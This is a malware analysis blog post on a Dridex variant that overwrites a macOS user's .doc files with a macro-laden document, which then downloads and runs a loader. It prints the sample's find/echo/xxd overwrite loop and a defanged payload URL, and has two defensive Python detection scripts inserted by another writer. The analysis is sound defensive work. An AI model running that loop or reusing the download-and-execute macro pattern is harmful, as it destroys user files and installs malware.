Dridex Returns, Targets MacOS Using New Entry Method


Malware

The Dridex variant we analyzed targets MacOS platforms with a new technique for delivering documents embedded with malicious macros to users.
By: Armando Nathaniel Pedragoza

January 05, 2023


Usually, documents containing malicious macros enter a user's system via email attachments posing as normal document files. However, while this might be the primary method of arrival, malicious actors have other ways of entering a victim's system.
This blog entry primarily concerns Dridex, an online banking malware that has been active for years. The variant we analyzed has made its way onto the MacOS platform and has adopted a new technique for delivering documents embedded with malicious macros to users without having to pose as invoices or other business-related files.

The Dridex sample we investigated arrived as a Mach-O executable file, a.out (which we detect as Trojan.MacOS.DRIDEX.MANP). The first submission of this file to VirusTotal (VT) dates to 2019, where it was tagged as malicious by security vendors without specific detection names.

Figure 1. Mach-O regions, which include the header, load commands, and segments of the file

Figure 2. Detections of a.out from April 2019 to December 2022

The data segment of the sample contains the malicious embedded document and is referenced through the _payload_doc variable. The disassembly in Figure 5 shows that the malware runs a loop in which the content of _payload_doc is copied until the counter reaches _payload_doc_len, the size of the malicious code. This is in preparation for the overwriting routine.

Figure 3. Disassembly of the __DATA__data segment


Figure 4. Disassembly of how the sample writes data onto the target files

Once the malicious code is ready, the cstring segment plays its part in writing that code over the target files. This segment contains the following bash script command:
for i in $(find ~ -name "*.doc"); do echo '%s' | xxd -r -p > $i; done
First, the malware searches the current user's home directory (~/User/{user name}) for files with the .doc extension using the find ~ -name "*.doc" command. It then iterates over each document file (i) in a for loop and emits the malicious code via the echo '%s' command (where %s is the malicious code from the data segment).
The xxd -r -p stage means that %s is supplied as a plain hexadecimal dump, which xxd converts back into the raw document bytes rather than writing the hex text itself. The > $i part of the script redirects that output into each document file, replacing its contents.

Figure 5. Disassembly of the __DATA__cstring segment

The disassembly in Figure 6 shows the value of %s that will be written to the document files. The malicious code it writes carries a D0CF file format signature, as seen in the image, which is the header of a Microsoft (OLE compound) document file.

Figure 6. Disassembly of the sample that shows the search and overwriting commands

The malicious embedded document was first detected in the wild in 2015 with the following information:
SHA256: 70c7bf63bfe1fb83420905db6e65946d721e171db219034a52b27116795ae53e
Filename: pmB3A6.doc
Detection name: W2KM_DRIDEX.SPB
Using oletools, a Python package for analyzing OLE and Microsoft Office files, we observed that the affected .doc files now contain macros.
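To show the overwrite from the defender's side, here is an added Python example; it is not code from the original post or from Trend Micro. It reverses a plain hex dump the way xxd -r -p does, checks for the D0CF OLE header that the post points out, and groups *.doc files under a directory by SHA-256 so that many distinct documents sharing one hash (the footprint of the find/echo loop described above) stand out. The directory tree, file names, hex bytes and the min_copies threshold are constructed fixtures and choices of mine.

```python
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path

# First eight bytes of an OLE2 compound document: the "D0CF" signature the
# post points out in the overwritten .doc files.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def hexdump_to_bytes(hex_text: str) -> bytes:
    """Reverse a plain hex dump the way `xxd -r -p` does: drop whitespace and
    decode the remaining hex digit pairs into raw bytes."""
    return bytes.fromhex("".join(hex_text.split()))


def is_ole_document(data: bytes) -> bool:
    """True if the buffer starts with the OLE2 compound-document header."""
    return data[:8] == OLE_MAGIC


def find_mass_overwritten_docs(root, min_copies: int = 3) -> dict:
    """Hash every *.doc under root and return {sha256: [paths]} for hashes
    shared by at least min_copies files. Distinct documents that suddenly
    carry byte-identical content are the footprint of a mass overwrite."""
    by_hash = defaultdict(list)
    for path in Path(root).rglob("*.doc"):
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        by_hash[digest].append(str(path))
    return {h: sorted(p) for h, p in by_hash.items() if len(p) >= min_copies}


def build_sample_tree() -> str:
    """Constructed fixture (not real malware): a temp directory with two
    distinct .doc files and four that have been 'overwritten' with the same
    OLE header bytes decoded from a plain hex dump."""
    root = Path(tempfile.mkdtemp(prefix="docscan_"))
    for i in range(2):
        (root / f"notes{i}.doc").write_bytes(OLE_MAGIC + f"unique body {i}".encode())
    # Constructed hex dump: OLE header fields only, no document body.
    payload = hexdump_to_bytes(
        "d0cf 11e0 a1b1 1ae1 0000 0000 0000 0000 0000 0000 0000 0000 3e00 0300 feff 0900"
    )
    docs = root / "Documents"
    docs.mkdir()
    for name in ("invoice.doc", "report.doc", "memo.doc", "draft.doc"):
        (docs / name).write_bytes(payload)
    return str(root)


if __name__ == "__main__":
    hits = find_mass_overwritten_docs(build_sample_tree())
    for digest, paths in hits.items():
        print(f"{digest[:16]}... shared by {len(paths)} files")
        for p in paths:
            print("  ", p)
```

Pointing find_mass_overwritten_docs at a real home directory is the practical use: a handful of identical .doc hashes across unrelated folders is a much stronger signal than any single file's content, and the hash can then be compared against the SHA256 the post lists.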

Figure 7. Text prompt showing that this document file contains macros

Figure 8. Macros contained in the overwritten .doc file that were extracted using oletools

Based on the extracted macros, the .doc file contains suspicious components. To elaborate, here are the VBA components of the overwritten documents:
ThisDocument is an object that includes the autoopen macro, which calls the malicious functions. These functions use normal-looking names to pose as regular functions. For example, CreatePicture and CreateColor are names you would expect on routines that create image-related objects, but in this VBA project they perform malicious tasks.

Figure 9. Code snippet from the autoopen macro

Module1 creates an executable file in the temporary (TEMP) folder and then runs it. The malware uses string concatenation to obfuscate the name of the executable file it creates.

Figure 10. Code snippet from Module1 that shows how the malware creates and executes an executable file

Module2 contains the routine that decrypts a set of strings into a URL and then connects to it to retrieve a file using the GET command. The malware uses basic string encryption to hide the malicious URL it connects to. It calls the RuBik() function to perform the decryption routine.

Figure 11. Code snippet from Module2 showing the decryption routine used to connect to the encrypted URL

Module3 writes the content of the file retrieved in Module2 to the executable file created in Module1.

Figure 12. Code snippet from Module3 showing where the malware writes to the executable file
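As an added illustration of how a defender might triage macro text once oletools has extracted it (this is my own example, not code from the post, from Trend Micro or from oletools, whose olevba does a fuller version of the same idea), the Python below looks for the three traits the modules above share: an auto-executing entry point, calls that reach the file system or run a program, and names assembled from short string pieces. The VBA excerpt is a constructed stand-in that mimics the shape described above and does nothing by itself; the keyword list and the scoring weights are my own choices.

```python
import re

# Constructed VBA excerpt in the shape the post describes: an auto-executing
# entry point calling innocuously named subs and a TEMP path assembled from
# short string pieces. It is not the malware's code and does nothing by itself.
SAMPLE_VBA = r'''
Sub autoopen()
    CreatePicture
End Sub

Sub CreatePicture()
    Dim p As String
    p = Environ("TEMP") & "\" & "tru" & "me" & "1.exe"
    CreateColor p
End Sub
'''

# Procedure names Office runs without a click (short, olevba-style list).
AUTOEXEC = re.compile(
    r"\bSub\s+(AutoOpen|Auto_Open|Document_Open|AutoExec|Workbook_Open)\s*\(", re.I
)

# Calls worth a second look when they sit next to an auto-exec entry point.
SUSPICIOUS = {
    "Environ (resolves TEMP/APPDATA style paths)": r"\bEnviron\s*\(",
    "Shell (runs an external program)": r"\bShell\b",
    "CreateObject (COM automation, e.g. XMLHTTP downloads)": r"\bCreateObject\s*\(",
    "binary file write": r"\bOpen\b.*\bFor\s+Binary\b",
}

# Two short string literals joined with '&': one join is ordinary VBA, a run
# of them suggests a name being assembled to evade plain-text matching.
SHORT_CONCAT = re.compile(r'"[^"]{1,8}"\s*&\s*"[^"]{1,8}"')


def triage_vba(src: str) -> list:
    """Return human-readable findings for one extracted VBA module."""
    findings = []
    m = AUTOEXEC.search(src)
    if m:
        findings.append(f"auto-exec entry point: {m.group(1)}")
    for label, pattern in SUSPICIOUS.items():
        if re.search(pattern, src, re.I):
            findings.append(f"suspicious call: {label}")
    joins = len(SHORT_CONCAT.findall(src))
    if joins >= 2:
        findings.append(f"string-concatenation obfuscation: {joins} short-literal joins")
    return findings


def risk_score(findings) -> int:
    """Crude score: an auto-exec entry point combined with any suspicious
    call is the pairing that matters; obfuscation adds weight."""
    has_autoexec = any(f.startswith("auto-exec") for f in findings)
    calls = sum(f.startswith("suspicious call") for f in findings)
    obfuscated = any(f.startswith("string-concatenation") for f in findings)
    return (3 if has_autoexec else 0) + calls + (2 if obfuscated else 0)


if __name__ == "__main__":
    found = triage_vba(SAMPLE_VBA)
    for line in found:
        print("-", line)
    print("risk score:", risk_score(found))
```

The regexes deliberately match on call shape rather than on specific strings such as the file name or URL, since those are exactly the parts the author obfuscates; the concatenation heuristic catches the trume1.exe style of name assembly regardless of what the pieces spell.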

In this section, we analyze the payload dropped by the malware. Note that since it is an exe file, it will not run in a MacOS environment. It is possible that the variant we analyzed is still in its testing phase and has not yet been fully converted to work on MacOS-based machines.
When the document is opened and the macro is enabled, the malware connects to the URL decrypted in Module2 to retrieve a file (87i4g3d2d2.exe) using the GET command:
hxxp://pr-clanky[.]kvalitne[.]cz/65y3fd23d/87i4g3d2d2[.]exe
While the macro feature in Microsoft Word is disabled by default, the malware overwrites all of the current user's document files, including clean ones. This makes it harder for the user to tell that a file is malicious, since it does not come from an external source.
After connecting to the domain, the content of the portable executable (PE) file is written to trume1.exe (aa6873a6002e152669f54c80801ca7d500ee8c00d5a6a8c223203303b1cbaf50), as analyzed in Module1, 2, and 3. The file trume1.exe is then executed.

Figure 13. Network activity from the sample that shows the details of the URL it connects to

Figure 14. Payload of the sample when the macro-enabled document is opened

The content of the dropped executable file is HTML rather than a PE file because the URL it tries to reach is already down. The PE file it attempts to download is the Dridex loader.

Figure 15. Content of the executable file dropped by the malware

Conclusion
Dridex is not a new malware; it has been observed in the wild for years now. Despite its age, it continues to be used, and in fact has seen many improvements over time. Its entry point into the user's system has traditionally been via email attachments, but this blog entry illustrates that the malicious actors using Dridex are also looking for new targets and more efficient methods of entry.
Currently, the impact of this Dridex variant on MacOS users is limited, since the payload is an exe file (and therefore not compatible with MacOS environments). However, it still overwrites document files, which then become carriers of Dridex's malicious macros. Furthermore, it is possible that the threat actors behind this variant will make further modifications that render it compatible with MacOS.
We encourage users to avoid infection by attacks that use social engineering and malicious documents by refraining from clicking links or opening attachments and embedded documents in emails. Furthermore, organizations can consider using security technologies such as Trend Micro™ Worry-Free™ Business Security, which supports Mac and is suited to small and medium-sized companies, and Trend Micro™ Apex One™, a security solution for enterprise businesses.
Indicators of Compromise

The indicators of compromise for this entry can be found in this document.

MITRE Tools, Tactics, and Procedures

Tactic | ID | Name | Description
--- | --- | --- | ---
Discovery | T1083 | File and Directory Discovery | Uses the find command to search for specific files within the file system and runs the echo command to overwrite files
Execution | T1204.002 | User Execution: Malicious File | Requires the victim to run the malware .out file
Execution | T1027 | Obfuscated Files or Information | Parts of files are encoded to hide the plain-text strings
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic | Uses macros to execute payloads
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | Uses HTTP GET requests to contact the command-and-control (C&C) server
Exfiltration | T1041 | Exfiltration Over C2 Channel | Sends data to the C&C server
